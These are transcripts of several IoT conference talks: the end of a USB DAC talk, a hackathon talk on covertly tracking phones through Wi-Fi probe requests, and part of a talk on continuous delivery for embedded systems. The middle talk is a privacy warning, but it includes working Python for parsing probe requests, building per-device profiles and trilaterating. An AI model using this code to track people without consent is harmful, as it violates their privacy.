fails. And it's a little bit like digital systems — one and zero, what we hear about all the time in our business. When it works, it's beautiful. When it fails, it fails so miserably that it's not even funny. So, cables go both ways. I like them because they're intuitive: you plug them in; you unplug them, it goes dead. And I think that's partially because of the install base. Plus, what I'm making — at least what I'm playing with in the lab right now — plugs into all these wireless gadgets you can get. The Google Chromecast, for example, has an optical output that would plug into what I'm making next. So wireless can be an accessory; it doesn't need to be a core part of my product. At least that's what I've chosen. The other thing with wireless is the CE marking I mentioned: what costs 70,000 kroner at Nemko with cables costs 110,000 kroner at Nemko when it's wireless. [Audience comment.] Yeah, that's my experience too.
That's good. I found some similar stuff in Slovenia; that was also around the 30,000-kroner mark. So, yeah. Wireless adds to your bill of materials, because you need to buy the actual wireless chip. It adds to the cost of testing that it works before you send it out to the market. And it adds a lot of cost to me as a developer. So yes, there is a pull for wireless, but it doesn't necessarily overlap with the quality-conscious market I'm going after. People see that with wireless — with Bluetooth audio, say — they can get the same convenience and reasonable quality, but the higher-quality performance comes from something you can actually plug in. And then you avoid all the potential hassles from it. Okay. Any more questions? [Audience question.] Yeah, I know. I need to prioritize my time very hard, and for me, flying solo, developing everything needed for that functionality would simply take too much of the focus. There are legal matters too, but just developing that embedded technology would be too much for me. For someone who could put a ten-person team on it for half a year, it's not a problem — but they have the volumes to defend that. Some people are triggered by the convenience; some people are triggered by the high quality. If you merge the two — and the next session will partially be about that — things get more complex and more expensive, and the price tag would simply be too high for a lot of people. I used to travel as a field application engineer with Nordic Semiconductor in the US, and the customers I would talk to there would say things like: oh, we need to make one of these that can be on the 29.99 shelf at some given retail store.
And if your chip costs more than this, then we need to bump the end product from the 29.99 shelf to the 39.99 shelf, where expectations are higher and where this product wouldn't sell. So you need to help us stay in the 29.99 segment. So you might have been up against the same kind of logic there, where they gave you the convenience but not the high-end performance — you had to choose. Okay, that's what I had. I'm going to put my toys down, and hopefully they will all work in the next embedded debugging session later on. Thank you for your time, and I hope there were a couple of things here to bring home or to put into your projects.
At the outskirts of the Internet of Things are the interconnects to the actual analog world around us. Henry Audio is the ambition to connect the net with the personal emotions in the music we listen to. A digital protocol met precise analog electronics in the Open Source project Audio Widget. One result of this international cooperation is a USB DAC (digital-to-analog converter) which gets top reviews with music lovers and at the same time can have its code and schematics explored in minute detail. Børge Strand-Bergesen tells the story about the conception of the project and the various bumps in the road on the way from code to consumer product.
10.5446/50514 (DOI)
I'm going to start off by saying that I'm actually experiencing an IoT-related problem right now, because a friend of mine who does a lot of public speaking suggested that I should definitely use a heart rate tracker to check my heart rate while I was on stage, because it could be pretty interesting. And I didn't charge it this morning, so it's actually low on battery, but it seems like it's still running. And right now my heart rate is 82, if anybody is interested. Okay, the reason I'm here now is that a month ago I was attending an event in Oslo, the Arctic IoT Challenge. It's the first of its kind in Oslo. It's basically a hackathon that goes from Thursday to Sunday, where you have three days of working together in a team to create something cool that's IoT-related. We had six teams competing, making different things. Some were controlling robots, some were making drones, some were creating smart things for the home. A lot of cool things going on. And this is me with my team. We decided that we wanted to do something a bit different. Before the hackathon, we were thinking about what we should do, what we should make. And we came up with the idea that we wanted to do something a bit satirical, poking fun at our own naive interest in technology and all of these cool things that you can put in the cloud, as opposed to the for-profit companies who are actually making these things and driving technology forward. So we came up with a fictional company called Evil Corp. And what Evil Corp does is provide free Wi-Fi for the masses. It's very altruistic. They create these Wi-Fi hotspots that they put out in different locations and allow people to connect to them and get free Wi-Fi. And Evil Corp is, of course, not doing this just because they're kind. They're doing it because they want to earn some money.
And since they're giving their product away for free, they sort of have to do something else. So what they're doing is tracking the data that's freely available in the air from people around their Wi-Fi hotspots. Yeah. And of course, we had to have a physical product that Evil Corp can put out there in physical locations — like shopping malls, et cetera — where consumers are congregating. And it looks something like this. This is a Wi-Fi hotspot. If you take a closer look at it, you'll probably notice that it has a Raspberry Pi strapped to it on one side, and on the other side it has a battery pack. And attached to the Raspberry Pi, it has Wi-Fi dongles. The cool thing about these Wi-Fi dongles is that, first of all, they're dirt cheap — you can buy them for $2 from China. And second, they support something called monitor mode. Basically, what that means is that you can use these dongles to access information in the network that you really aren't supposed to be accessing. In particular, we're very interested in the mobile phones that everybody has in their pockets when they're walking out and about. And the thing about mobile phones is that if they're Wi-Fi enabled, they're looking for wireless networks that they already know, and they're trying to connect to those networks. How that basically works is that the mobile phone sends out something called a probe request. The probe request contains information that seems more or less innocent: it contains the MAC address — a unique identifier for the phone's hardware — and the SSID, the name, of a known network the phone is looking for. And this is just broadcast; anyone can pick up on it. And that's what we did. On the first day of the hackathon, we put together three of these devices and put them out in the area where we were working. I don't think I have sound, but it's OK. Since I don't have sound, there's going to be a surprise at the end that doesn't make any sense.
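To make the probe request concrete: here is a minimal, stdlib-only sketch of how such a frame can be decoded once a monitor-mode dongle hands you the raw bytes. This is not our actual hackathon code — the layout just follows the 802.11 management-frame format (a 24-byte header with the transmitter address at offset 10, then tagged parameters, where tag 0 carries the SSID), and in real captures a radiotap header usually has to be stripped off first.

```python
def parse_probe_request(frame: bytes):
    """Parse a raw 802.11 probe-request frame (no radiotap header).

    Returns (source_mac, ssid) for probe requests, None otherwise.
    """
    if len(frame) < 24:                 # too short for a management header
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0b11            # frame type: 0 = management
    subtype = (fc >> 4) & 0b1111        # subtype: 4 = probe request
    if ftype != 0 or subtype != 4:
        return None
    src = frame[10:16]                  # addr2 = transmitter (the phone)
    mac = ":".join(f"{b:02x}" for b in src)
    # Tagged parameters start right after the 24-byte MAC header.
    pos, ssid = 24, ""
    while pos + 2 <= len(frame):
        tag_id, tag_len = frame[pos], frame[pos + 1]
        if tag_id == 0:                 # tag 0 = SSID the phone is probing for
            ssid = frame[pos + 2: pos + 2 + tag_len].decode("utf-8", "replace")
            break
        pos += 2 + tag_len
    return mac, ssid
```

An empty SSID means a broadcast probe ("anyone out there?"); the interesting ones for profiling are the directed probes that name a specific known network.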
This is the place that we were at — the venue. In every corner, we put out one of these devices on the first day. And what basically happens is that everybody at the hackathon is none the wiser; they just walk around all day long with their mobile phones in their pockets, and we collect information. This is Benny Hill, by the way. We had fun Benny Hill music in the presentation here, so that makes a lot of sense. So people are walking around with their mobile phones in their pockets. And their mobile phones are unwittingly transmitting information about them being there — first of all, because if they aren't there, then there's no transmission going on. And they're transmitting information about what networks they're looking for, and about the phone itself, the hardware address, so that we can pick this up and do something with it. So our devices are now in the corners of the room, and we're starting to pick up a lot of information. These probe requests are sent out continuously. If your mobile phone is looking for Wi-Fi, it will just be blasting out these probe requests, and we can pick them up and send them to a central location — a piece of cloud software that we wrote that takes all this information and starts building profiles: a profile for each unique device that we see. So basically, you walk around the room and your phone sends out these probe requests, and we get information from all of the different places that you've been, and we can add it all to one centralized profile, because we have your unique address. And so we build a profile on each and every device, and then we push it onto a dashboard. Sorry. It looks something like this. If we just take a look first on the left-hand side here: each of these three columns is one of the beacons that we've put in a corner of the room.
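The profile-building on the cloud side is, at its core, just a dictionary keyed on the hardware address, folding in every report the beacons send up. A toy version of what our aggregator did might look like this (the names and field choices are made up for illustration):

```python
from collections import defaultdict
from dataclasses import dataclass, field

@dataclass
class Profile:
    ssids: set = field(default_factory=set)        # networks the phone probed for
    sightings: list = field(default_factory=list)  # (beacon_id, timestamp, rssi)

# One profile per unique hardware (MAC) address.
profiles = defaultdict(Profile)

def record_probe(mac, ssid, beacon_id, timestamp, rssi):
    """Fold one probe-request report from a beacon into the central profile."""
    p = profiles[mac]
    if ssid:                  # skip broadcast probes with an empty SSID
        p.ssids.add(ssid)
    p.sightings.append((beacon_id, timestamp, rssi))
    return p
```

The sightings list is what drives the dashboard (when and near which beacon a device was seen), while the SSID set is the part that turns out to be surprisingly identifying.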
And every line here represents a device that we are currently seeing. So whenever somebody new comes into the room, they'll show up here more or less immediately, like within a second. And we keep this updated: every time new information comes in, it's pushed to this dashboard in real time. We also have a signal strength indicator for each of the beacons that sees them, so that we can use that to say something about how close they are to each beacon. So this is sort of interesting in itself. You have information about a device that comes and goes, so you can keep track of how it moves and where it has been at a certain time. And you think, okay, well, that's not too bad, because it's anonymous data and it doesn't really matter that much. So the next step here is to go from having anonymous movement data to actually trying to identify that person, so that you have an identified person moving around and you're tracking that instead. If we take a look on the side here, we have the actual profile. The profile is very basic: it's made up of the names of the networks that people's phones are looking for. And you would think that would be pretty innocent information, but it turns out this is actually quite rich in itself — at least it was for some of the people who were walking around here. Phones were leaking information about maybe the name of the employer people work for, maybe even their own name, if their home Wi-Fi is named after them. Personally, I found my own phone the first day, and it had information about the name of my father's company. It suggested that I've been on a boat. It suggested that I've been in New York. It suggested that I'm from Denmark and travel to Denmark to visit family. All of these things are clues that you can pick up on. And it's surprisingly easy to go from anonymous data to at least being in a situation where you can make an educated guess about the identity of the person.
But we, of course, were not satisfied with just having this semi-identity information. We wanted to do something more. So we came up with a tool for enriching our profiles. Basically, the idea is that if we are going to give this away for free out in shopping malls or whatever, we want people to sign up for it and give us some information about themselves. So we created this. And basically, again, we had some really cool music here, but no. The idea is that you scan a QR code here and you log in. You log in by just punching in your name, basically. And we are immediately able to tie that information to your profile here. So Hans Arne has just typed in his name, and we've already picked it up and pushed it to the dashboard. And if we go here, we'll see that when he updates his information, so do we. And this is pretty cool. But imagine that you swapped out just a name with maybe a Facebook Connect or something. That would probably be easier to do. And now you have real-time location data connected to information about who this person is in real life, who their friends and family are. These are their pictures. These are their interests. Could we sell something to them? I don't know. Pretty interesting stuff. Last but not least, we have an attempt at triangulation, which is basically taking the signal strength from each of these hubs that we are collecting information from and trying to do a calculation based on the signal strength. If you have this good signal strength here and here, that should put you in maybe this area. And to be perfectly honest, this didn't really work. At the venue that we were at, it was a closed room, not very big, and we had just too much dodgy data. I can show you because we have a small demo here. We made a tool for calibration, and you can also trigger these probe requests. So every time we press there, we get an update on the screen. This is pretty much just garbage.
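For completeness, here is roughly what the attempted triangulation could look like: convert each beacon's signal strength to a distance estimate with a log-distance path-loss model, then solve the resulting circle equations by least squares. This is a generic textbook sketch, not the team's implementation; the `tx_power` and path-loss exponent `n` are made-up constants that would need per-venue calibration, which is exactly where noisy indoor data makes this fall apart.

```python
import math

def rssi_to_distance(rssi, tx_power=-40.0, n=2.5):
    """Log-distance path-loss model: crude RSSI -> metres estimate.
    tx_power is the expected RSSI at 1 m; n is the environment exponent.
    Both are assumed values and must be calibrated per venue."""
    return 10 ** ((tx_power - rssi) / (10 * n))

def trilaterate(beacons, distances):
    """Least-squares (x, y) position from >= 3 beacons and distance estimates.
    Linearises the circle equations against the last beacon."""
    (x3, y3), r3 = beacons[-1], distances[-1]
    rows, rhs = [], []
    for (x, y), r in zip(beacons[:-1], distances[:-1]):
        rows.append((2 * (x3 - x), 2 * (y3 - y)))
        rhs.append(r**2 - r3**2 - x**2 - y**2 + x3**2 + y3**2)
    # Solve the 2x2 normal equations by hand to stay dependency-free.
    a11 = sum(a * a for a, _ in rows); a12 = sum(a * b for a, b in rows)
    a22 = sum(b * b for _, b in rows)
    b1 = sum(a * c for (a, _), c in zip(rows, rhs))
    b2 = sum(b * c for (_, b), c in zip(rows, rhs))
    det = a11 * a22 - a12 * a12
    return ((a22 * b1 - a12 * b2) / det, (a11 * b2 - a12 * b1) / det)

beacons = [(0.0, 0.0), (10.0, 0.0), (0.0, 10.0)]
true_pos = (3.0, 4.0)
dists = [math.dist(true_pos, b) for b in beacons]
print(trilaterate(beacons, dists))  # (3.0, 4.0) with perfect distances
```

With exact distances this recovers the position; with real indoor RSSI, multipath and absorption make the distance estimates jump around, which matches the "just garbage" result the team saw.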
We used this tool to try at least to calibrate the triangulation. I think it would probably be possible to get a lot better results if you were out maybe at a larger place. Something like that would probably help a lot. Anyway, we were three guys. We put this together over three days. When we chose the subject, we knew that it was possible to do these things. These things aren't new. They've been around for a long, long time. Your mobile phones are leaking information all the time. There are many companies out there building tools that use that information for really useful applications. Like if you go to the airport and it says there's five minutes of waiting time, that could be something like this used to see who's coming and going and how long they are staying in this area, and using that information to calculate the queue. People use it to measure traffic, those sorts of things. Plenty of useful scenarios for this sort of technology. But it's also kind of scary to see that three guys with three days at their disposal and with hardware that cost less than $100 are actually capable of putting together something like this. It was surprisingly easy to do. The technology is widely available. You could go out and pick up a couple of Raspberry Pis or a couple of Wi-Fi dongles and start putting this together, tie that up with a battery pack, drop them in garbage bins around town, and actually you've built a pretty good surveillance system. I guess that's probably the takeaway here. We have all of this cool new technology that's fun to make and fun to use. But every time we're introducing all of these exciting opportunities, we're also introducing opportunities for abuse. Already technology is part of everything that we do every day. With the introduction of IoT devices in our homes, on our bodies, these things, the opportunities for abuse are just going to explode. There's going to be so much more of it. I think that the takeaway here is that, damn, this was easy.
We as developers have a lot of responsibility that when we make stuff, we do it with a bit of deliberate thought about security measures, those sort of things. It's been very uplifting to be here today and hear people talk about it. It seems like the red line that goes through everything here has actually been security. That's very comforting to know. These are a couple of profiles that we put together at the conference. When I made this presentation on the last day, the guy who was after me speaking, he actually recognized his profile on the right there. That was kind of funny. I'll just end off by saying that Arctic IoT Challenge was a month ago. There's 11 months until next time, I guess. It was a ton of fun. If you guys are interested in IoT, I suggest that you make note of that web address there right now and you remember that for next year. Maybe go in. I don't know if you can sign up for a mailing letter or something. It's going to be great fun. It's only going to get bigger. I would love to see everybody next year. Any questions? Yeah? Actually, I don't know. I'm guessing it's probably trying to reach a specific network and get a response. Do you know, Asper? Basically, what you're saying is that it does it to speed up the process of connecting to the Wi-Fi network. That's great. We actually have a situation here where it's more important to get connected to the Wi-Fi network a couple of seconds faster, but at the same time, just giving away a lot of information about that's cool. Anybody else? Okay. Thank you. Thank you.
In February Team EvilCorp took home the 2nd place at the first Arctic IoT Challenge. With only three days at their disposal three people were able to put together both the hardware and the software required to track actual people based on data "leaking" from mobile phones. Using hobbyist hardware that cost less than $100. The technology required to do so is in no way groundbreaking, it is well known and has many useful applications. The big surprise for the team was how easy it was to abuse seemingly innocent data. With IoT gaining ground, these are things developers need to care about. In this short session we will take a closer look at what we managed to build during a three day hackathon.
10.5446/50515 (DOI)
Hi, everyone. My name is Mike. I'm from Pragma, a continuous delivery consultant. This is Internet of Things Day, so I want to talk about integrating all the things. My background is in embedded systems, large-scale embedded systems for the oil and gas industry. So I spent more or less 10 years building these big industrial things that you use to find and drill for oil and gas. But since then, I've been focusing more and more on making teams develop products faster and the tools and practices around that. And that's what I want to talk about, the intersection of these two things, how to make products that are physical, integrated, Internet of Things devices, and how to do it efficiently. And look at some of the, so I would say the ecosystem around all this. So our mission, should we choose to accept it, I want to show that there is some real challenges, obviously, in developing reliable IoT products. There's been a lot of talk about security today. And I think this is a big concern we all have. And I think one aspect of security is one aspect of the kind of quality we'd like to build into these products. So we're going to explore the techniques that we can apply to the problem and look at case studies for customers, for companies that are already working on this stuff. I'm, like I said, an embedded software person with a flavor for DevOps these days. I'm also a trainer. I do give courses in Git and Jenkins and TDD. And I'm a certified Docker trainer for what that's worth. And I also run a business here in Oslo that helps companies adopt continuous delivery. So how many people here consider themselves embedded software engineers? Okay, there's a few. So for me, when, I don't know if you guys are the same, but when I first heard the phrase IoT, I kind of rolled my eyes. Actually, I felt like I've heard this all before. We had this 10 years ago when it was called M2M. And it also feels like, in a way, DevOps to me does. It's a cute phrase that's fun to say. 
But it just gives a name to something that's been around for a very long time. Whatever way you think about it, IoT has always been there. We've always made embedded devices with internet connectivity as long as there has been internet connectivity. On the other hand, it is a really fun space. And despite the fact that it's got a funny name, IoT is actually a ballooning industry. There are more and more things that we're connecting to the internet. This is why we have IPv6 in the first place. So we're going to have an explosion of smart devices. And this is a fun time to be a technologist. So I'll try not to be a grumpy old man about IoT, and I'll just embrace it today. I don't want to define IoT, but briefly I just want to look at the attributes of IoT, because these will play an important part in how we can build these systems. So the most important thing about IoT is the T, actually, the things: they're physical things that happen to be part of our world. There's hardware and software co-design and they interact with our environment. They are either sensing and monitoring the environment or they're actually actuating on the environment that we work in. They're also distributed in nature, connected via networks. And although they can often work in coordination, they're usually independent actors focused on one specific need. And the idea with these IoT things is to add some intelligence to otherwise dumb parts of our world. It's not just fridges. So this is another way to describe what IoT is: intelligent, distributed, physical systems. Now, for those of us that come from a software background, actually all those words kind of terrify us, because we know that distributed systems are hard. We know that making intelligent systems is hard. We know that making physical systems is hard. So that's what I want to talk about today. This is the hard thing about hard things.
What do we do when we're faced with these very difficult problems? There is complexity in this problem. There's complexity in distributed computing, of course. This has been known for a long time. The guys at Sun Microsystems always knew this. This was their domain, actually. Their problem space was the network computer. And there's a list of fallacies that everybody working with distributed computers or designing distributed systems kind of falls prey to. We design these systems thinking that the network is going to be reliable, latency is going to be zero, bandwidth is going to be infinite, blah, blah, blah. We just can't think of all the ways that these things can go wrong in reality. And that's part of IoT, right? They're distributed systems, but they're not just distributed, they're physical systems. So there are a lot of fallacies that people making embedded systems, hardware and physical systems, fall prey to as well, such as: the hardware always works. The environment never changes. The resources are endless. We're never going to run out of memory. The sensor is always going to be calibrated. The data we're reading from our sensor across three time zones is definitely live. It's not just returning the same thing over and over again. We're assuming all kinds of things. The clock is in sync. The data it's giving us is actually at the right time that we believe it to be. And then, of course, we have the more life cycle issues. How do we keep this thing on? Is the power reliable? What happens when we lose power? Is there a safe time to lose power? And what happens when it comes back on again? How do we keep these systems up to date? And actually today, most of the talks that I've been to have been security focused in some way. And Hans Alpou was in the rifle talk, right. This was a really cool talk about how to hack a Linux-powered rifle.
The interesting thing is, when the flaw was discovered and it was published, the manufacturer said that they would send out an update on a USB stick to the however many thousand people that have bought the product. That's not a really scalable way to update your system. We need systems to be up to date. And as we connect them to the network and we bring them into our homes, we bring them onto our bodies, we let them drive our cars, it's of paramount importance that we keep them up to date. And then of course, there's the fallacy of intelligent systems. There is the idea that we're smart enough to figure out how to do this thing. And that's never true. Complex systems never work. It's been known ever since we've had systems, actually. Complex systems never work. The first time you do anything, it will never work. John Gall has written a lot about this, but so has Jerry Weinberg. There's a lot of good information. Obviously, the first time you do something, it never works. But that's why you should start small. All the best systems start from small simple things that work. This sounds pretty familiar, right? And this is the way we've approached software in the last 15 years as well. We don't want to design a big complex system. We want to start with something small and iterate to make it bigger and bigger, more and more features, do more and more stuff. This is how we figured out how to actually make software. We realized that we couldn't do complex things. We couldn't design it up front. For me, there are two very important principles in the Agile Manifesto that come into play here. The one is that, obviously, we want to start early and give value continuously. And the other is that working software is the primary measure of progress. Those two are actually another way of saying this. How do you start from a small system and grow it into something that's complex and still have it work?
And it's these two principles that are the enabler for that. And for me, coming from a continuous delivery and continuous integration point of view, these are the two principles that we try to solve with continuous delivery. So I'm not going to go through all of this, this is just a fun cartoon, but the point is that there is a system in place that we've devised in software to make sure that, if you like, continuous delivery is the technical implementation of those agile principles. How do we make sure that we can continuously deliver valuable software that works? How do we make sure that the software always works? Well, we have continuous integration, which is the gray box. We say that once the software builds and it runs any kind of simple test, then it's good enough to share with my colleagues. That means I'm not going to break it for anyone else. But that's not to say that after that point, it's good enough to ship, it's good enough to put in your car, it's good enough to put in your pacemaker. After that, you need what's called the continuous delivery pipeline, where any other steps in your process that need to happen before the code can be considered potentially shippable have to happen. And obviously, I would promote as much of this to be automated as possible, but some of this stuff can take a really long time. For instance, with the trucks at Volvo, they have to go through many, many steps before you could say that this is actually good enough to go into a truck. But still, there is a pipeline, there is a process, and there is a way for always-working software to be ready for the customer. That's all it is. Continuous delivery is just the implementation of those principles. So I want to go back to the things and the Internet of Things, because for me, that's the most interesting part. The Internet isn't interesting, it's just a network. But the things that we attach to it are actually the important thing.
I'm going to contrast that by looking at a project that was actually my very first project after graduating, and look at how we made software then and how we make software now and see the differences. So I was young, I got a job after university to join a company that was making products for the oil and gas industry. And my first project was to make a rotary steerable drilling tool, which is basically a long tool that has some pads on it on the side and then a drill bit. And then when you're drilling for oil, what you do is you put this down into the well bore and you spin it around. You have a long pipe all the way up to the top, to the rig, and you spin it. Spin it really fast, like 200 times a minute. And while this thing is going around, you want to spin it. You want to steer it. So you've got gyros, you've got accelerometers, you've got shock measurements, all these things. And in real time, you want to try and drill a path towards where the driller wants the drill bit to go. So this was quite a project for someone straight out of university who never programmed C before. I was determined to make a go of it and I wanted to learn as much as I could. So I wrote down all the steps that were necessary in this professional world of software development. So I found out the first step you do when starting a software project is you take a copy of the code base for the existing product. So we're going to make a new tool. Well, there's an old tool already. Let's just copy the code base for that product. We'll start from there. And then what you do is you spend a few months documenting its current algorithms. This is important because nobody knows how this code works. The person that actually wrote the control systems long gone. And it was done four or five years ago. So it's going to take some time to figure this out. You might need to have a systems engineer around for the math. 
Then what you want to do is be very careful about the changes you make to this source code, because you know it kind of sort of works. So any changes you make, surround them with #ifdefs so that you can always switch them off again if it doesn't work out. Then the most important and the longest part of this development process is testing. So what you want to do is you want to test it on your own hardware on your desk. You want to put it into a tool and test it down in the shop. You want to put mud through it and power up and watch it steer in an automated flow loop. And you want to go to Oklahoma, you want to go to Siberia, you want to test it on the rigs. Take as much time as you like for testing. And then finally, when you're happy with the results, everybody's happy, you commit that code as a new project in the version control system. And you hope someone's going to take care of merging it into the previous project at some point in the future. Then you compile it on your laptop and give it to manufacturing. That's how we do professional software development. At least that's what I learned. I knew it was professional because we had a software development process and I followed it to the letter, and it was part of the product development process and part of the project governance approach. So we were ISO 9000 certified. So we were very professional. I am being ironic, though, but this project was actually considered to be very successful. It was very successful. The product worked, it met its commercial goals. And that was largely due to step four, where there was lots and lots and lots of testing. So there are two sides to this. This can work in that kind of context. But if we move towards modern times, this type of software development doesn't work. And I want to contrast this kind of project with the way we do embedded systems now.
So ideally, instead of having this as your professional software development process, you would have something more like this. As a developer, what you do is you fetch the latest source code, which is up to date with whatever is released, whatever your customers are using. You branch, you implement your feature, you test it on your machine. When you're happy with it, you think it's good enough, you push it to the central repository. The continuous integration system kicks off. It starts building your system, building your code, doing any unit tests you have, maybe any quick smoke tests you have. And if they're good, your code should get merged into the master branch. Then that should kick off a continuous delivery pipeline, which will do the static analysis, program your code onto a device, verify the device and the hardware and the software work together in an environment. Maybe you have a lab setup. You might even do canary deployment, where you deploy this to some customers and check that they're still happy and there are no complaints before you send it to all the customers. And then you want to get some real-time production feedback from those things. Now, I don't think there's anything too controversial here. This is the way most software is developed in the world. This is the way we should develop. If you go to any newspaper or broadcaster, or anybody with a website, really, this is their approach. So let's take a look at the difference between a project like this and a project like this. So back then, embedded systems were versioned like this. You just put them in a new folder and give it a different name. If you were really, really conscientious, you might make a backup every week and give it the name of the date. That was how you did product versioning. But now we have distributed version control systems. We have branching strategies that actually make sense and work, so that we can always work with working code as a team.
Now, I don't want to talk about branching strategies, but I want to talk about this. If you're working in embedded systems, this is a great book: A Practical Approach to Large-Scale Agile Development. It doesn't sound very interesting, I know. But it tells the story of the LaserJet business from Hewlett-Packard. The embedded systems for those, there were 800 people spread across five different continents and they had really tough legacy software issues. The book tells the journey of them transitioning to an agile way of working. They had a different branch for every product and they were trying to maintain patches and branches across all these hundreds of different LaserJet models. They had, I think, almost 100 people whose job it was just to merge and patch and build their software. You can imagine how slow and how unresponsive the system eventually becomes. One of the key learning points is just this. Actually having a release-train branching strategy can hugely improve your development speed. Of course, now we have better ways of versioning as well. We don't just take the Subversion revision number or the Git SHA. We have a way to put some semantic meaning on our versions as well for the products we build. We can tell consumers whether this is going to break, if it's a breaking change, if it's just a new feature, if it's a bug fix. You can figure out how you want to change your dependencies. Of course, we can stamp this information right into the products. This is important. Actually, Novelda is a company that I work with. What they want to do is, from one of their radars, be able to find out exactly what version of software is in that radar. From all the different components, all the different binaries, what versions they were and which Git SHA they were related to, which build information, where I can find them in the artifact management system; you can put that right into the binary.
You can ask the radar itself all this information. It's just simple stuff. You make a version.h and a build.h like we've always done. You have the system generated for you. Also, one of the things that have really changed between back when I started and now is that product families are really different. When I was starting systems, you had the old systems, which were maintained by what was called the sustaining organization and the new products, which were made by the engineering department. It was really interesting. Today, we talk about DevOps, about bringing operations and developers together. In a lot of engineering organizations, it's even worse than that. There's a support function and a development function, and they don't even talk to each other. The people that are making the stuff are not the people that are supporting the stuff, so they never get that feedback from the customers. That was very much the case. I think it still is in some places. Now, we don't have the old one and the new one. We have the family. We want to sell products. We want customization. Like Volvo, every single truck they make is different, but they have to use the same stuff. They have to use the same software, the same tools, the same tests. That only works if you can reuse. Of course, back then, I was building an ID. I don't think anyone does this now, but this was how we cut a release. We opened our laptop and we pressed build. I think that this blog post from Jeff Atwood really changed the way we approached this. It's crazy. It was only six or seven years ago where he said you should have a script for your build instead of using the ID, and it was considered like news. I don't think anyone would release software like this now. The thing that was missing, of course, is the traceability to figure out how was this thing made? Should I be worried? Where did it come from? How do I make it again? How do I reproduce this? Can I get the same results? 
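Generating those headers at build time is one common way to stamp traceability into the firmware. Here is a sketch with invented macro names (not any particular project's convention); in a real pipeline the values would come from `git rev-parse` and the CI server's environment variables rather than being hard-coded.

```python
def make_build_header(version, git_sha, build_url, build_number):
    """Render a build.h that stamps traceability info into the firmware,
    so the device itself can answer 'exactly what am I running?'."""
    return "\n".join([
        "#ifndef BUILD_H",
        "#define BUILD_H",
        f'#define FW_VERSION "{version}"',
        f'#define FW_GIT_SHA "{git_sha}"',
        f'#define FW_BUILD_URL "{build_url}"',
        f"#define FW_BUILD_NUM {build_number}",
        "#endif /* BUILD_H */",
    ]) + "\n"

# Example values; a CI job would substitute its own version, SHA, and job URL.
header = make_build_header("2.1.0", "9fceb02", "https://ci.example/job/fw/312", 312)
print(header)
```

The firmware then just compiles this header in and exposes the macros through whatever query interface the device already has.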
What we do is we put this in, we create a Jenkins system, a server that can do all this. The idea is that, while at least the server we should know a little bit about, if it's a developer laptop, we don't know so much. We start putting all our configuration in this Jenkins user interface. I don't think that's a very good solution either because who knows, anyone can change that. Nobody can track it. The traceability and reproducibility of using Jenkins isn't really there. It has a lot of other benefits, but you won't solve those problems with using Jenkins. What you need to do is instead define your builds as code in some way. Find some kind of text format that you can version alongside your software so that you can track exactly how something was built in the past. You want to check out a version of the code from a year ago. You want to know exactly how the build server was set up then. This is job DSL. There's a lot of different ways to do this, but this is one way. You don't even have to stop there. You can go way beyond that and look at the whole ecosystem of tools you use and figure out what would be a traceability ecosystem for building these products. How could I use Artifactory and configuration as code tools like Docker and Vagrant and Puppet to actually be able to reproduce reproducible development environments from code that is version controlled. Maybe this seems like going a bit too far, but for a lot of, especially safety critical systems, this is the only way you can really control how something was built, which header files were included in the build, what was the library path when something was built. These are all important considerations and you can only do that when you have control over the entire environment. This is something also, for me, interesting about Docker because I was at DockerCon and there was maybe 100 presentations there this year and they were all nearly from web companies. 
All the places that I'm implementing, well, say 99% of the places that I'm implementing Docker solutions, they're embedded, safety-critical places where they want to be able to say, I want to rebuild this ASIC. I want to know exactly that this same ASIC is going to be built, or I'm going to put in some code that controls the braking system of our truck. I want to be able to know exactly how it was built. There are a lot of different uses for Docker, not just for creating microservice websites. Then of course, if you have this configuration as code, you can have Phoenix builds. You can basically spin up and spin down build systems as you please. They're no longer special dedicated build servers. You can use the cloud to spin them up and tear them down and create new ones as you please, and the developers can have access to the same environments. One of the fun things about that rotary steerable drilling tool that I was telling you about is that the only way to update the software was to send a zip file to basically a workshop, a mechanical workshop, and people would maybe take the tool on a helicopter from the rig to the shop and the mechanics would open it up. Then they would attach a JTAG to it and flash the thing. That was the only way to update it. Now, we have a lot of systems where they just get updated automatically over the air. The latest version of the software is always available. Now, this is a really hard thing to get right with IoT devices, because there's so much that can go wrong when an update occurs. We've got used to over-the-air software updates with phones and so on, but actually to implement this on an IoT device, if you make it yourself, it's very, very difficult. It can take a year of development to have a reliable update system where you know that no matter what kind of failure mode, you won't break the device. Now, that's all well and good. This is how we build the software.
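One common way to get that "no failure mode bricks the device" property is an A/B (dual-slot) update scheme: write the new image to the inactive slot, verify what actually landed there, and only then atomically flip the boot pointer, so a power cut at any moment still leaves a bootable image behind. A file-based sketch follows; the slot layout and `DualSlotUpdater` class are invented for illustration, and real firmware would do this against flash partitions and a bootloader rather than files.

```python
import hashlib
import json
import os
import tempfile

class DualSlotUpdater:
    """A/B update sketch: the device always keeps one known-good slot."""

    def __init__(self, root):
        self.root = root
        self.state_file = os.path.join(root, "boot_state.json")
        if not os.path.exists(self.state_file):
            self._write_state({"active": "slot_a"})

    def _write_state(self, state):
        # Write-then-rename so the boot pointer changes atomically.
        tmp = self.state_file + ".tmp"
        with open(tmp, "w") as f:
            json.dump(state, f)
        os.replace(tmp, self.state_file)

    def active_slot(self):
        with open(self.state_file) as f:
            return json.load(f)["active"]

    def apply_update(self, image, expected_sha256):
        target = "slot_b" if self.active_slot() == "slot_a" else "slot_a"
        path = os.path.join(self.root, target)
        with open(path, "wb") as f:
            f.write(image)
        # Verify what was actually written before flipping the pointer.
        with open(path, "rb") as f:
            if hashlib.sha256(f.read()).hexdigest() != expected_sha256:
                raise ValueError("image failed verification, keeping current slot")
        self._write_state({"active": target})
        return target

root = tempfile.mkdtemp()
updater = DualSlotUpdater(root)
firmware = b"firmware v2"
print(updater.apply_update(firmware, hashlib.sha256(firmware).hexdigest()))  # slot_b
```

A corrupt or truncated download fails the hash check, the pointer never flips, and the device keeps booting the old slot, which is the whole point of the scheme.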
